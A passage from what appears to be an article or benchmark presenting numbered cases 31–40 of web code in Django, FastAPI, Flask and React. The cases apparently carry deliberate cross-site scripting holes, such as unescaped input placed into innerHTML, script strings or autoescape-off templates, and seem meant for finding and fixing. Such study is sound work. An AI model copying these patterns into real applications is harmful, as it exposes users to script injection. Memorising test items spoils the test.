class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Case 31 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">dashboard</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">msg</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">dashboard.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">msg</span><span class="sh">"</span><span class="p">:</span> <span class="n">msg</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- dashboard.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showBanner</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">banner</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;p&gt;Notification: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msg</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"banner"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;h1&gt;</span>Dashboard<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">showBanner</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ msg }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <blockquote> <p><strong>Note:</strong> This is the one case in the set requiring two coordinated fixes at different layers. See Table 4 above.</p> </blockquote> <h3> Case 32 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">HTMLResponse</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/settings</span><span class="sh">"</span><span class="p">,</span> <span class="n">response_class</span><span class="o">=</span><span class="n">HTMLResponse</span><span class="p">)</span> <span class="k">def</span> <span class="nf">settings</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">lang</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">en</span><span class="sh">"</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"""</span><span class="s"> &lt;html&gt; &lt;body&gt; &lt;h1&gt;Settings&lt;/h1&gt; &lt;p&gt;Your language preference: </span><span class="si">{</span><span class="n">lang</span><span class="si">}</span><span class="s">&lt;/p&gt; &lt;p&gt;Visit our &lt;a href=</span><span class="sh">"</span><span class="s">/help?lang=</span><span class="si">{</span><span class="n">lang</span><span class="si">}</span><span class="sh">"</span><span class="s">&gt;help page&lt;/a&gt;.&lt;/p&gt; &lt;/body&gt; &lt;/html&gt; </span><span class="sh">"""</span> </code></pre> </div> <h3> Case 33 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">jsonify</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">activity_feed</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/activity</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_activity</span><span class="p">():</span> <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="nf">get_json</span><span class="p">()</span> <span class="n">action</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">action</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)))</span> <span class="n">activity_feed</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">action</span><span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">})</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/feed</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">feed</span><span class="p">():</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">feed</span><span class="sh">"</span><span class="p">:</span> <span class="n">activity_feed</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- feed.html (served separately as a static file) --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Activity Feed<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"feed"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">/feed</span><span class="dl">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">data</span><span class="p">.</span><span class="nx">feed</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">item</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">feed</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">+=</span> <span class="dl">"</span><span class="s2">&lt;p&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">item</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">});</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 34 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">HttpResponse</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Report</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">Report</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="n">title__icontains</span><span class="o">=</span><span class="n">query</span><span class="p">)</span> <span class="n">items_html</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span> <span class="n">items_html</span> <span class="o">+=</span> <span class="nf">format_html</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;li&gt;{}&lt;/li&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="n">r</span><span class="p">.</span><span class="n">title</span><span class="p">)</span> <span class="n">html</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sh">"</span><span class="s">&lt;h2&gt;Results for: {}&lt;/h2&gt;&lt;ul&gt;{}&lt;/ul&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="n">query</span><span class="p">,</span> <span class="n">items_html</span> <span class="p">)</span> <span class="k">return</span> <span class="nc">HttpResponse</span><span class="p">(</span><span class="n">html</span><span class="p">)</span> </code></pre> </div> <h3> Case 35 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Product Search<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">id=</span><span class="s">"search"</span> <span class="na">placeholder=</span><span class="s">"Search products..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;ul</span> <span class="na">id=</span><span class="s">"suggestions"</span><span class="nt">&gt;&lt;/ul&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">input</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">search</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">suggestions</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">suggestions</span><span class="dl">"</span><span class="p">);</span> <span class="nx">input</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">input</span><span class="dl">"</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/suggestions?q=</span><span class="p">${</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">suggestions</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="nx">data</span><span class="p">.</span><span class="nx">results</span><span class="p">.</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">item</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">suggestions</span><span class="p">.</span><span class="nx">insertAdjacentHTML</span><span class="p">(</span> <span class="dl">"</span><span class="s2">beforeend</span><span class="dl">"</span><span class="p">,</span> <span class="s2">`&lt;li class="suggestion"&gt;</span><span class="p">${</span><span class="nx">item</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="s2">&lt;/li&gt;`</span> <span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 36 </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ProfilePage.jsx</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useEffect</span><span class="p">,</span> <span class="nx">useRef</span><span class="p">,</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">react</span><span class="dl">"</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">ProfilePage</span><span class="p">({</span> <span class="nx">userId</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">profile</span><span class="p">,</span> <span class="nx">setProfile</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">bioRef</span> <span class="o">=</span> <span class="nf">useRef</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/profile/</span><span class="p">${</span><span class="nx">userId</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="nf">setProfile</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span> <span class="p">},</span> <span class="p">[</span><span class="nx">userId</span><span class="p">]);</span> <span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">profile</span> <span class="o">&amp;&amp;</span> <span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">)</span> <span class="p">{</span> <span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">profile</span><span class="p">.</span><span class="nx">bio</span><span class="p">;</span> <span class="p">}</span> <span class="p">},</span> <span class="p">[</span><span class="nx">profile</span><span class="p">]);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">profile</span><span class="p">)</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">p</span><span class="o">&gt;</span><span class="nx">Loading</span><span class="p">...</span><span class="o">&lt;</span><span class="sr">/p&gt;</span><span class="err">; </span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">className</span><span class="o">=</span><span class="dl">"</span><span class="s2">profile</span><span class="dl">"</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h1</span><span class="o">&gt;</span><span class="p">{</span><span class="nx">profile</span><span class="p">.</span><span class="nx">displayName</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/h1</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">p</span><span class="o">&gt;</span><span class="nx">Member</span> <span class="nx">since</span><span class="p">:</span> <span class="p">{</span><span class="nx">profile</span><span class="p">.</span><span class="nx">joinDate</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/p</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">className</span><span class="o">=</span><span class="dl">"</span><span class="s2">bio-section</span><span class="dl">"</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">bioRef</span><span class="p">}</span> <span class="sr">/</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Case 37 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">tickets</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/ticket</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">submit_ticket</span><span class="p">():</span> <span class="n">title</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">tickets</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">:</span> <span class="n">title</span><span class="p">,</span> <span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">:</span> <span class="n">body</span><span class="p">})</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Ticket submitted.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/tickets</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_tickets</span><span class="p">():</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">tickets.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">tickets</span><span class="o">=</span><span class="n">tickets</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- tickets.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Support Tickets<span class="nt">&lt;/h1&gt;</span> {% for ticket in tickets %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"ticket"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ ticket.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"body"</span><span class="nt">&gt;</span>{% autoescape off %}{{ ticket.body }}{% endautoescape %}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 38 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="k">def</span> <span class="nf">preferences</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">saved</span> <span class="o">=</span> <span class="bp">False</span> <span class="n">email</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">:</span> <span class="n">saved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">preferences.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">:</span> <span class="nf">escape</span><span class="p">(</span><span class="n">email</span><span class="p">),</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">:</span> <span class="n">saved</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- preferences.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showConfirmation</span><span class="p">(</span><span class="nx">email</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">banner</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">confirmation</span><span class="dl">"</span><span class="p">);</span> <span class="nx">banner</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Preferences saved for: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">email</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Notification Preferences<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"email"</span> <span class="na">placeholder=</span><span class="s">"Email address"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Save<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> {% if saved %} <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"confirmation"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">showConfirmation</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ email }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> {% endif %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 39 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">HTMLResponse</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">comments.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS comments ( id INTEGER PRIMARY KEY AUTOINCREMENT, author TEXT NOT NULL, text TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">add_comment</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">author</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)))</span> <span class="n">text</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">text</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)))</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO comments (author, text) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">author</span><span class="p">,</span> <span class="n">text</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">,</span> <span class="n">response_class</span><span class="o">=</span><span class="n">HTMLResponse</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">rows_data</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT author, text FROM comments</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="n">rows</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">rows_data</span><span class="p">:</span> <span class="n">rows</span> <span class="o">+=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">&lt;tr&gt;&lt;td&gt;</span><span class="si">{</span><span class="n">c</span><span class="p">[</span><span class="sh">'</span><span class="s">author</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="s">&lt;/td&gt;&lt;td&gt;</span><span class="si">{</span><span class="n">c</span><span class="p">[</span><span class="sh">'</span><span class="s">text</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="s">&lt;/td&gt;&lt;/tr&gt;</span><span class="sh">"</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"""</span><span class="s"> &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;body&gt; &lt;h1&gt;Comments&lt;/h1&gt; &lt;table&gt; &lt;thead&gt;&lt;tr&gt;&lt;th&gt;Author&lt;/th&gt;&lt;th&gt;Comment&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt; &lt;tbody&gt;</span><span class="si">{</span><span class="n">rows</span><span class="si">}</span><span class="s">&lt;/tbody&gt; &lt;/table&gt; &lt;/body&gt; &lt;/html&gt; </span><span class="sh">"""</span> </code></pre> </div> <h3> Case 40 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">reviews.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span 